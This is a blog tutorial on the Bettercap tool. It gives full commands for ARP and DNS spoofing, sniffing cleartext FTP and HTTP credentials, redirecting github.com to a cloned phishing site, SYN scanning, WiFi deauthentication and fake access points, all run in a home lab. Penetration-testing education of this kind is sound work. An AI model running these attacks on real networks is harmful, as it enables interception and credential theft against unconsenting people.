Bettercap Tutorial & Top Commands (2024 Update)

Bettercap Tutorial & Top Commands

Are you wondering how to use Bettercap and why it’s essential for your toolkit?

Bettercap is a versatile tool for network reconnaissance, enabling a range of activities, including seamless man-in-the-middle attacks.

In this Bettercap tutorial, we’ll explain what Bettercap is, briefly discuss ARP spoofing and man-in-the-middle attacks, and show you its most used features so you can utilize the tool effectively.

We’ll walk you through setting it up and then show you some of its functionalities, including ARP and DNS spoofing, port scanning, finding cleartext credentials when insecure protocols are used, and WiFi hacking.

If you’re ready to dive into our Bettercap cheat sheet, let’s begin.

What Is Bettercap?

Bettercap, a portable framework written in GO, is often considered a Swiss army knife for its extensive capabilities in performing reconnaissance, attacking WiFi, and scanning Bluetooth low-energy devices and Ethernet networks.

It’s a tool used by many in cyber security, including penetration testers, reverse engineers, and security researchers, to perform MitM (Man-in-the-Middle) attacks, also known as on-path attacks.

Bettercap allows you to leverage all the features needed to analyze networks and devices and builds upon classic tools like Ettercap to create an advanced modern suite for wired and wireless network attacks.

Some of its features include:

  • IP host discovery and reconnaissance
  • Network spoofing attacks via ARP, DNS, NDP, DHCPv6 poisoning
  • Port scanning
  • WiFi network scanning and attacks like de-authentication and WPA/WPA2 handshake capturing

Bettercap can be installed on Windows, Linux, macOS, and Android.

ARP Spoofing and MitM Attacks

One of the many features of Bettercap is its ability to perform ARP spoofing, sometimes referred to as ARP poisoning, which we’ll demonstrate later. For now, let’s discuss what it is and how it works.

All devices connected to a network use MAC addresses to communicate with each other at the data link layer of the OSI Reference Model within the same subnet.

If preventive measures aren’t implemented, someone on the same subnet could change the ARP table of a host by sending spoofed ARP replies to redirect network traffic to a malicious device.

This enables someone to sit between the traffic of devices to eavesdrop and intercept sensitive communications, modify data in transit, or impersonate devices to gain unauthorized access to systems and services.

For a more detailed look at this process, see How to Perform an ARP Poisoning Attack: A Step-by-Step Guide.

Preparing to Follow Along With Our Bettercap Tutorial

If you’d like to follow along with our tutorial, you’ll need to set up a hacking lab with a hacking machine like Kali or Parrot OS and at least one other virtual machine.

See How to Create a Virtual Hacking Lab: The Ultimate Hacker Setup if you need help setting up your lab.

For the demo below, we’ll show you how to use Bettercap commands to perform a couple of on-path attacks (ARP and DNS spoofing), but before we get started, let’s show you how to install it.

Bettercap is only intended for authorized network testing and educational purposes. Usage against networks without explicit permission is illegal. Users take full responsibility for any unauthorized use of this tool. Details are included in our article, “Is Hacking Illegal? The Law and Ethical Perspectives.”

Bettercap Installation

Bettercap can be installed in several ways, such as via Docker, precompiled binaries, or compiled from source.

We’ll use Kali Linux for our demo, and Bettercap is available in the Kali rolling repositories for easy installation.

To conveniently set up Bettercap with all the necessary dependencies on the most recent Kali release, you can run the following:

sudo apt update 

sudo apt install bettercap

Install Bettercap

If you are installing it on Docker, compiling from source, compiling on Android, or deploying on other Linux distributions (like Ubuntu or Fedora based ones), visit the Installation Page on the official website.

Starting Bettercap

You can run Bettercap via a web UI, interactive session, or scripting. We’ll be running our demo via the interactive session mode. But we’ll quickly show how to start Bettercap as a web interface.

To start the web UI, enter: sudo bettercap -caplet http-ui 

Start Bettercap Web UI

As you can see from the screenshot above, the http.server is located at http://127.0.0.1. Open this in your browser, and you’ll see the login screen.

Bettercap Login page

The default Bettercap username is user, and the default password is pass.

To change these values, edit the following file:

/usr/share/bettercap/caplets/http-ui.cap

Bettercap http-ui.cap

Once you’ve logged in, you’ll see the web dashboard.

Bettercap Web Dashboard

To start Bettercap in interactive session mode using the default interface—ours is eth0—simply enter sudo bettercap in the terminal.

Start Bettercap

If you want to bind to another interface, specify it with the -iface flag. Such as sudo bettercap -iface <interface>

Bettercap Commands and Modules

Bettercap comes installed with modules. Modules extend the capabilities of Bettercap and are based on the type of functionality they provide.

These modules can be loaded and used during a Bettercap session and include:

  • Various modules: Essential for the framework's operation, such as events, UI, and API
  • Bluetooth LE: Modules for Bluetooth Low Energy devices scanning, reconnaissance and attacks
  • WiFi: Modules relating to WiFi networks, access points, client attacks, etc.
  • HID on 2.4 GHz: MouseJacking and wireless HID attacks
  • IPv4/IPv6: Network host/topology discovery, sniffing, spoofing IPv4/v6 networks
  • Proxies: man-in-the-middle proxy modules
  • Servers: modules to create various simple servers
  • Utils: miscellaneous utility modules providing additional functionality

To see a list of available commands and modules, you can enter help.

Bettercap Help
Bettercap Modules

If you need a detailed module explanation, including its parameters, enter help <module>.

For example, let’s look at the info for the net.probe module.

Help net.probe

To see details on currently running modules at any time, use the active command.

Bettercap Active Modules

In the following sections, we’ll walk you through some of the Man-in-the-Middle attacks we can perform with Bettercap.

Bettercap Host Discovery

Once inside the network, our priority is mapping live hosts before we can perform any other actions.

The first step is to use the net.probe command to probe for new hosts on the network. Bettercap does this by sending packets to all IPs in the subnet. We can start the probing by using the net.probe on command.

Tip: Modules can be turned on and off with the command module on/off.

Bettercap net.probe

Bettercap will continue to look for any new hosts that come online until you turn off net.probe.

To see all the hosts found by the probe, you can use the command net.show. It will display all hosts, the gateway, and our machine (eth0) in a table.

Bettercap net.show

The module has discovered three devices on the network with IP addresses ending in 133, 134, and 135. At this point, we could leverage additional tools like Nmap to explore and validate these hosts further.

Choosing a Target to Spoof

For our demo, we’ll choose the Windows 10 machine as our target (192.168.37.133).

We’ll poison the Windows machine's ARP table to intercept its traffic. By spoofing the gateway's MAC address, the target will route packets destined for the gateway through our machine instead.

This ARP spoofing enables us to position ourselves between the Windows device and the gateway to sniff communications.

First, let's take a look at the current ARP table on the Windows host.

Windows ARP Table

As you can see from above, the MAC addresses of our attacking machine at 192.168.37.128 and the gateway at 192.168.37.2 are different.

To begin the spoofing on the target, we need to tell Bettercap which device’s ARP table we want to poison. As we are poisoning the Windows machine, we must use the following command:

set arp.spoof.targets 192.168.37.133 followed by arp.spoof on.

Bettercap arp.spoof

Now, we check the ARP table on the Windows machine; we see that our attacking machine has the same MAC address as the gateway.

Windows Spoofed ARP Table

The spoofing attack has worked.

With Bettercap, you can also spoof the entire subnet using the command set arp.spoof targets without providing any targets.

Only connections to and from the external network will be spoofed by default. If you set arp.spoof.internal to true, ARP spoofing will also occur for local communications among devices on the internal network.

Capturing Data With Bettercap

Now that we’ve spoofed the ARP table of the Windows machine, we can start capturing data flowing between it and the gateway.

To begin the sniffing process, we need to set net.sniff to on with the net.sniff on command.

Bettercap net.sniff

If you’d like to save the captured packets to a pcap file for further analysis, use the set net.sniff.output filename.pcap before turning on the net.sniff module.

Tip: Bettercap allows you to use tab completion for commands. Simply start typing a command and then hit tab to see possible options and quickly autocomplete.

We’ll be able to capture all sorts of traffic, such as DNS, NetBIOS Name Service (NBNS), FTP, and more.

For example, if someone from the Windows machine logs in to an FTP server without using secure protocols, we can see the clear text credentials.

Bettercap FTP Credentials

Capturing Web Traffic With Bettercap

Sniffing the traffic also allows us to see all web traffic by the Windows machine. This can give us insight into the user's online activities, expose sensitive information they transmit or request, and potentially harvest login credentials if they visit sites using cleartext HTTP.

If someone visits an unsecured site and enters any credentials, we can capture these and use them for other services or applications.

Bettercap HTTP Credentials

As the screenshot below shows, the user has also visited Github. Let's make a note of this for the DNS spoofing attack to come.

Bettercap Sniffed Traffic

DNS Spoofing With Bettercap

DNS spoofing enables us to send users to any domain we want. Sitting between the traffic gives us much power to redirect, monitor, and potentially manipulate the data exchange. This capability can be used for various purposes, such as phishing, credential harvesting, or spreading malware.

The first step is to create a malicious site where we can send the user. You can use the site cloner option inside the Social Engineer Toolkit.

We have an article that will walk you through creating the site; see Unlock SET: How to Use The Social Engineer Toolkit Effectively.

Next, we must let Bettercap know which site we want to spoof. Remember from earlier; we saw a user visiting Github.

Let’s use that information to our advantage. Anytime someone attempts to visit Github, we’ll redirect them to our cloned site and collect their credentials.

To do this, we use the command set dns.spoof.domains github.com, and then to start the spoofing, we use dns.spoof.on.

Bettercap dns.spoof

When users visit github.com, they will be redirected to our cloned site.

Cloned Github Page

If the user enters any credentials, they’ll be captured in the social engineer toolkit.

Creds in SET

Bettercap Caplets

Caplets are script files that allow you to automate tasks and are a list of commands executed in order.  

Rather than manually entering Bettercap commands individually, you can use caplets to bundle together tailored workflows.

Bettercap comes preloaded with caplets, which you can view using the caplet.show command.

Bettercap Caplets

Bettercap uses different paths to load caplets and uses the /usr/share/bettercap/caplets path as its default.

Caplet paths can be customized by setting the CAPSPATH variable to your chosen paths.

To see the other paths, enter caplets.paths.

Bettercap Caplets Path

We can create a caplet to perform the same tasks we performed in the tutorial.

To create a caplet, simply open any text editor and enter the commands you want to perform, ensuring they are in the order you want completed.

Let's create a caplet to start probing for hosts, set a spoofing target, and then begin sniffing traffic.

Bettercap Create Caplet

net.probe on

set arp.spoof targets 192.168.37.133

arp.spoof.on

net.sniff on

Save this file to one of the paths, ensuring you use the .cap extension (we saved ours as test.cap).

We need to run the caplet when we start Bettercap. Enter the following in the terminal.

sudo bettercap -caplets test.cap

Bettercap Use Caplet

Bettercap Port Scanning

Bettercap is also a very fast port scanner. Although less robust than other port scanners like Nmap and RustScan, it allows you to run a SYN scan against any targets you have located during host discovery. It will also attempt to perform banner grabbing against any open ports.

To run a port scan, you use the command syn.scan <IP Range> <Start Port> <End Port>.

Here’s an example of a port scan against host 192.168.37.135 looking for open ports between 20 and 500.

syn.scan 192.168.37.135 20 500

Bettercap Port Scan

Bettercap WiFi Attacks

Another cool feature of Bettercap is its power to perform wireless devices reconnaissance and attacks.

For example, it can send de-authentication or disassociation packets to force devices to reconnect, enabling the capture of the four-way handshake for offline cracking, and it can also create a rogue access point to lure devices into connecting.

We’ll show you a brief example of its capabilities.

You’ll need a compatible WiFi adapter with monitor and injection modes enabled to perform these attacks. Ensure that the adapter is set up and ready to be used. You can read How to Hack WiFi With Kali Linux Like a Pro for more information.

Use the following commands to start Bettercap, ensuring you use the correct interface for Wifi, and begin scanning for networks.

sudo bettercap -iface wlan0mon

wifi.recon on        

Bettercap Wifi Hacking

To see a list of all discovered access points, use the command wifi.show, which will display a table of found SSIDs with the corresponding BSSID, encryption type, WPS version, the number of connected clients, and data sent and received.

Bettercap wifi.show

From here, you could attempt to perform a deauth attack and then try to capture the handshake to take offline and crack.

Bettercap also makes it easy to create fake access points with just a few quick commands.

set wifi.ap.ssid <SSID>

set wifi.ap.bssid <BSSID>

set wifi.ap.channel <Channel>

set wifi.ap.encryption false

wifi.recon on; wifi.ap

Bettercap - create fake access point

The newly created access point will come online and be broadcasted, available for other devices to connect to.

Fake Access Point

Conclusion

After reading this guide, you should better understand how to use Bettercap.

This powerful and versatile tool can help you conduct network reconnaissance and analysis during red team or security research engagements.

Throughout our tutorial, we walked you through installing Bettercap, discussed its flexibility via built-in modules, and explored techniques like ARP spoofing, traffic sniffing, and DNS spoofing with practical examples.

Are you looking to dive deeper into network recon or penetration testing? Then, join the StationX Community for courses on these topics and take advantage of our many benefits, including mentorship, career guidance, and more.

Frequently Asked Questions

Level Up in Cyber Security: Join Our Membership Today!

vip cta image
vip cta details
  • Richard Dezso

    Richard is a cyber security enthusiast, eJPT, and ICCA who loves discovering new topics and never stops learning. In his home lab, he's always working on sharpening his offensive cyber security skills. He shares helpful advice through easy-to-understand blog posts that offer practical support for everyone. Additionally, Richard is dedicated to raising awareness for mental health. You can find Richard on LinkedIn, or to see his other projects, visit his Linktree.

>